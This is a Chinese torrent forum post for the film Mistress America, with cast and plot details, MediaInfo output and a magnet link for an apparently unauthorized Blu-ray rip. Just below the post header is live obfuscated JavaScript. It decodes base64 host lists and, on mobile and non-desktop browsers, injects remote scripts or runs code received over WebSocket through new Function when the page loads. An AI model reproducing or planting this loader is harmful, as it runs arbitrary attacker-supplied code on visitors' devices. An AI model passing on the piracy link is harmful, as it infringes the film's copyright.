美国情人[中文字幕].Mistress.America.2015.1080p.BluRay.x265.10bit.DTS 5.08GB

版主小s 1月前 731

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDA2OQ==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x6b\x62\x74\x42\x4f\x58\x63\x64\x53\x4e']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9vamxzZGtmai41MS10b3VyLm5ldCxodHRwczovL29zbGRramZsLmNoYYW95aTQuYY29t','d3NzOOi8vd3MuaG5qanNoLmNvbTo4MDgwLHdzczovL3dzLnFpbmdsaXh5LmNvbTo4MDgwLHdzczovL3dzLnppb24tbGl2ZXMuY29tOOjgwOODA=',window,document,['Y','O']);}:function(){};

◎译  名 美国情人 / 纽约新鲜人(台) / 美国情妇 / 美国女主人 / 美国女杰
◎片  名 Mistress America
◎年  代 2015
◎产  地 美国
◎类  别 喜剧
◎语  言 英语
◎上映日期 2015-08-14(美国)
◎IMDb链接 https://www.imdb.com/title/tt2872462/
◎豆瓣评分 7.3/10 (11388人评价)
◎豆瓣链接 https://movie.douban.com/subject/24708493/
◎片  长 84分钟
◎导  演 诺亚·鲍姆巴赫 Noah Baumbach (id:1049678)
◎编  剧 诺亚·鲍姆巴赫 Noah Baumbach (id:1049678)
       格蕾塔·葛韦格 Greta Gerwig (id:1022652)
◎演  员 罗拉·科克 Lola Kirke (id:1345039)
       艾米·沃伦 Amy Warren (id:1335307)
       莎珑·华盛顿 Sharon Washington (id:1364244)
       凯瑟琳·厄布 Kathryn Erbe (id:1009349)
       贾思敏·赛法斯·琼斯 Jasmine Cephas Jones (id:1404271)
       马修·希尔 Matthew Shear (id:1353342)
       朱丽叶·布雷特 Juliet Brett (id:1264996)
       格蕾塔·葛韦格 Greta Gerwig (id:1022652)
       丽贝卡·纳奥米·琼斯 Rebecca Naomi Jones (id:1367215)
       米奇·萨姆纳 Mickey Sumner (id:1328943)
       克莱尔·弗利 Clare Foley (id:1321480)
       瑞贝卡·亨德森 Rebecca Henderson (id:1261734)
       迪恩·威尔汉姆 Dean Wareham (id:1023915)
       希瑟·林德 Heather Lind (id:1335637)
       张欣迪 Cindy Cheung (id:1077601)
       塞斯·帕里什 Seth Barrish (id:1349105)
       迈克尔·切鲁斯 Michael Chernus (id:1335067)
       乔尔·加兰 Joel Garland (id:1101023)
       格蕾塔·葛韦格 Greta Gerwig (id:1022652)
       诺亚·鲍姆巴赫 Noah Baumbach (id:1049678)
       伊莱·布什 Eli Bush (id:1387571)
       萨姆·莱维 Sam Levy (id:1338092)
       詹妮弗·拉梅 Jennifer Lame (id:1338444)

◎标  签 美国 / 2015 / 喜剧 / 文艺 / 青春 / 纽约 / 剧情 / 独立电影

◎简  介
  特雷西(萝拉·科克 Lola Kirke 饰)是一名平凡的女大学生,落在人群之中毫不起眼。一成不变的生活和日复一日平淡令特雷西的内心备受煎熬,她一直向往着能够前往纽约生活,在她的内心里,纽约这座灯红酒绿的大城市代表着更多的希望和更璀璨的未来。                                    
                                终于有一天,特雷西的梦想要成真了。她联系上了即将要成为自己同父异母的姐姐的布鲁克(格蕾塔·葛韦格 Greta Gerwig 饰),在特雷西的眼中,布鲁克就是她想要成为的那种女孩。在布鲁克的带领之下,特里希过上了梦寐以求的生活,两人参加聚会,结交朋友,肆意挥洒着青春。然而,随着时间的推移,布鲁克所隐藏的秘密渐渐浮出水面。

◎获奖情况 (共2项)
  第19届美国在线影评人协会奖 (2015)
  最佳原创剧本(提名)

  第6届豆瓣电影鑫像奖 (2016)
  鑫豆单元 最容易忽视的好电影(提名)

  1. ##### MediaInfo ######

  2. General

  3. Unique ID                                : 47078689157998786496044954450852263940 (0x236B0695886304D74ACB0B9DC11F3804)

  4. Complete name                            : [email protected]OM.mkv

  5. Format                                   : Matroska

  6. Format version                           : Version 4

  7. File size                                : 5.08 GiB

  8. Duration                                 : 1 h 24 min

  9. Overall bit rate                         : 8 621 kb/s

  10. Movie name                               : Mistress America

  11. Encoded date                             : UTC 2021-09-07 04:05:35

  12. Writing application                      : mkvmerge v61.0.0 ('So') 64-bit

  13. Writing library                          : libebml v1.4.2 + libmatroska v1.6.4

  14. Cover                                    : Yes

  15. Attachments                              : cover.jpg


  16. Video

  17. ID                                       : 1

  18. Format                                   : HEVC

  19. Format/Info                              : High Efficiency Video Coding

  20. Format profile                           : Main [email protected]@Main

  21. Codec ID                                 : V_MPEGH/ISO/HEVC

  22. Duration                                 : 1 h 24 min

  23. Bit rate                                 : 6 957 kb/s

  24. Width                                    : 1 920 pixels

  25. Height                                   : 1 036 pixels

  26. Display aspect ratio                     : 1.85:1

  27. Frame rate mode                          : Constant

  28. Frame rate                               : 23.976 (24000/1001/53354) FPS

  29. Color space                              : YUV

  30. Chroma subsampling                       : 4:2:0

  31. Bit depth                                : 10 bits

  32. Bits/(Pixel*Frame)                       : 0.146

  33. Stream size                              : 4.10 GiB (81%)

  34. Writing library                          : x265 3.5+2-g2b25c9ba0+45:[Windows][GCC 10.2.0][64 bit] Yuuki 10bit+8bit+12bit

  35. Encoding settings                        : rc=crf / crf=17.0000 / qcomp=0.60 / qpstep=4 / stats-write=0 / stats-read=0 / no-lossless / no-cu-lossless / aq-mode=3 / aq-strength=0.90 / cbqpoffs=0 / crqpoffs=0 / ipratio=1.40 / pbratio=1.30 / psy-rd=2.00 / psy-rdoq=0.00 / deblock=0:0 / ref=6 / limit-refs=1 / no-limit-modes / bframes=8 / b-adapt=2 / bframe-bias=0 / b-pyramid / b-intra / weightp / weightb / min-keyint=24 / max-keyint=240 / rc-lookahead=24 / gop-lookahead=0 / NTMzNTQ=uuDQuD2mJt9fsCf / scenecut=40 / hist-scenecut=0 / radl=0 / max-cu-size=64 / min-cu-size=8 / me=3 / subme=7 / merange=48 / rdoq-level=0 / rd=4 / rdpenalty=0 / dynamic-rd=0.00 / no-rd-refine / ----- / cutree / sao / no-rect / no-amp / no-open-gop / wpp / no-pmode / no-pme / no-psnr / no-ssim / nr-intra=0 / nr-inter=0 / no-constrained-intra / no-strong-intra-smoothing / max-tu-size=32 / tu-inter-depth=1 / tu-intra-depth=1 / limit-tu=0 / qg-size=32 / qpmax=69 / qpmin=0 / ----- / cpuid=533541111039 / frame-threads=4 / numa-pools=+ / log-level=2 / input-csp=1 / input-res=1920x1036 / interlace=0 / level-idc=0 / high-tier=1 / uhd-bd=0 / no-allow-non-conformance / no-repeat-headers / aud / no-hrd / info / hash=0 / no-temporal-layers / lookahead-slices=0 / no-splice / no-intra-refresh / no-ssim-rd / signhide / no-tskip / max-merge=3 / temporal-mvp / no-frame-dup / no-hme / no-analyze-src-pics / no-sao-non-deblock / selective-sao=4 / early-skip / rskip / no-fast-intra / no-tskip-fast / no-splitrd-skip / zone-count=0 / no-strict-cbr / no-rc-grain / no-const-vbv / sar=0 / overscan=0 / videoformat=5 / range=0 / colorprim=2 / transfer=2 / colormatrix=2 / chromaloc=0 / display-window=0 / cll=0,0 / min-luma=0 / max-luma=1023 / log2-max-poc-lsb=8 / vui-timing-info / vui-hrd-info / slices=1 / no-opt-qp-pps / no-opt-ref-list-length-pps / no-multi-pass-opt-rps / scenecut-bias=0.05 / hist-threshold=0.03 / no-opt-cu-delta-qp / no-aq-motion / no-hdr10 / no-hdr10-opt / no-dhdr10-opt / no-idr-recovery-sei / analysis-reuse-level=0 / analysis-save-reuse-level=0 / analysis-load-reuse-level=0 / scale-factor=0 / refine-intra=0 / refine-inter=0 / refine-mv=1 / refine-ctu-distortion=0 / no-limit-sao / ctu-info=0 / no-lowpass-dct / refine-analysis-type=0 / copy-pic=1 / max-ausize-factor=1.0 / no-dynamic-refine / no-single-sei / no-hevc-aq / no-svt / no-field / qp-adaptation-range=1.00 / scenecut-aware-qp=0conformance-window-offsets / right=0 / bottom=0 / NTMzNTQ= / decoder-max-rate=0 / no-vbv-live-multi-pass

  36. Default                                  : Yes

  37. Forced                                   : No


  38. Audio

  39. ID                                       : 2

  40. ID in the original source medium         : 4352 (0x1100)

  41. Format                                   : DTS

  42. Format/Info                              : Digital Theater Systems

  43. Codec ID                                 : A_DTS

  44. Duration                                 : 1 h 24 min

  45. Bit rate mode                            : Constant

  46. Bit rate                                 : 1 509 kb/s

  47. Channel(s)                               : 6 channels

  48. Channel layout                           : C L R Ls Rs LFE

  49. Sampling rate                            : 48.0 kHz

  50. Frame rate                               : 93.750 FPS (512 SPF)

  51. Bit depth                                : 24 bits

  52. Compression mode                         : Lossy

  53. Stream size                              : 910 MiB (18%)

  54. Language                                 : English

  55. Default                                  : Yes

  56. Forced                                   : No

  57. Original source medium                   : Blu-ray


  58. Text #1

  59. ID                                       : 3

  60. ID in the original source medium         : 4611 (0x1203)

  61. Format                                   : PGS

  62. Muxing mode                              : zlib

  63. Codec ID                                 : S_HDMV/PGS

  64. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  65. Duration                                 : 1 h 23 min

  66. Bit rate                                 : 85.5 kb/s

  67. Count of elements                        : 3975

  68. Stream size                              : 51.2 MiB (1%)

  69. Title                                    : chs&eng

  70. Language                                 : Chinese

  71. Default                                  : Yes

  72. Forced                                   : No

  73. Original source medium                   : Blu-ray


  74. Text #2

  75. ID                                       : 4

  76. ID in the original source medium         : 4612 (0x1204)

  77. Format                                   : PGS

  78. Muxing mode                              : zlib

  79. Codec ID                                 : S_HDMV/PGS

  80. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  81. Duration                                 : 1 h 23 min

  82. Bit rate                                 : 86.1 kb/s

  83. Count of elements                        : 3975

  84. Stream size                              : 51.6 MiB (1%)

  85. Title                                    : cht&eng

  86. Language                                 : Chinese

  87. Default                                  : No

  88. Forced                                   : No

  89. Original source medium                   : Blu-ray


  90. Text #3

  91. ID                                       : 5

  92. ID in the original source medium         : 4613 (0x1205)

  93. Format                                   : PGS

  94. Muxing mode                              : zlib

  95. Codec ID                                 : S_HDMV/PGS

  96. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  97. Duration                                 : 1 h 23 min

  98. Bit rate                                 : 51.7 kb/s

  99. Count of elements                        : 3975

  100. Stream size                              : 31.0 MiB (1%)

  101. Title                                    : chs

  102. Language                                 : Chinese

  103. Default                                  : No

  104. Forced                                   : No

  105. Original source medium                   : Blu-ray


  106. Text #4

  107. ID                                       : 6

  108. ID in the original source medium         : 4614 (0x1206)

  109. Format                                   : PGS

  110. Muxing mode                              : zlib

  111. Codec ID                                 : S_HDMV/PGS

  112. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  113. Duration                                 : 1 h 23 min

  114. Bit rate                                 : 52.2 kb/s

  115. Count of elements                        : 3975

  116. Stream size                              : 31.3 MiB (1%)

  117. Title                                    : cht

  118. Language                                 : Chinese

  119. Default                                  : No

  120. Forced                                   : No

  121. Original source medium                   : Blu-ray


  122. Text #5

  123. ID                                       : 7

  124. ID in the original source medium         : 4608 (0x1200)

  125. Format                                   : PGS

  126. Muxing mode                              : zlib

  127. Codec ID                                 : S_HDMV/PGS

  128. Codec ID/Info                            : Picture based subtitle format used on BDs/HD-DVDs

  129. Duration                                 : 1 h 23 min

  130. Bit rate                                 : 69.9 kb/s

  131. Count of elements                        : 4254

  132. Stream size                              : 41.9 MiB (1%)

  133. Title                                    : eng

  134. Language                                 : English

  135. Default                                  : No

  136. Forced                                   : No

  137. Original source medium                   : Blu-ray


  138. Menu

  139. 00:00:00.000                             : 第 01 章

  140. 00:05:12.020                             : 第 02 章

  141. 00:09:03.167                             : 第 03 章

  142. 00:12:21.574                             : 第 04 章

  143. 00:15:26.592                             : 第 05 章

  144. 00:18:10.089                             : 第 06 章

  145. 00:20:56.296                             : 第 07 章

  146. 00:24:38.143                             : 第 08 章

  147. 00:27:30.065                             : 第 09 章

  148. 00:30:37.210                             : 第 10 章

  149. 00:32:51.302                             : 第 11 章

  150. 00:36:23.681                             : 第 12 章

  151. 00:39:24.862                             : 第 13 章

  152. 00:42:04.146                             : 第 14 章

  153. 00:45:20.634                             : 第 15 章

  154. 00:48:18.645                             : 第 16 章

  155. 00:51:11.485                             : 第 17 章

  156. 00:54:32.185                             : 第 18 章

  157. 00:58:43.603                             : 第 19 章

  158. 01:03:48.908                             : 第 20 章

  159. 01:06:45.167                             : 第 21 章

  160. 01:11:08.555                             : 第 22 章

  161. 01:15:55.551                             : 第 23 章

  162. 01:22:06.963                             : 第 24 章



TAGS 喜剧

磁力链:
  • magnet:?xt=urn:btih:1FB9C4653C2EEBD4CA655B7BF26095B72A808475
上传的附件:

BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。

最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖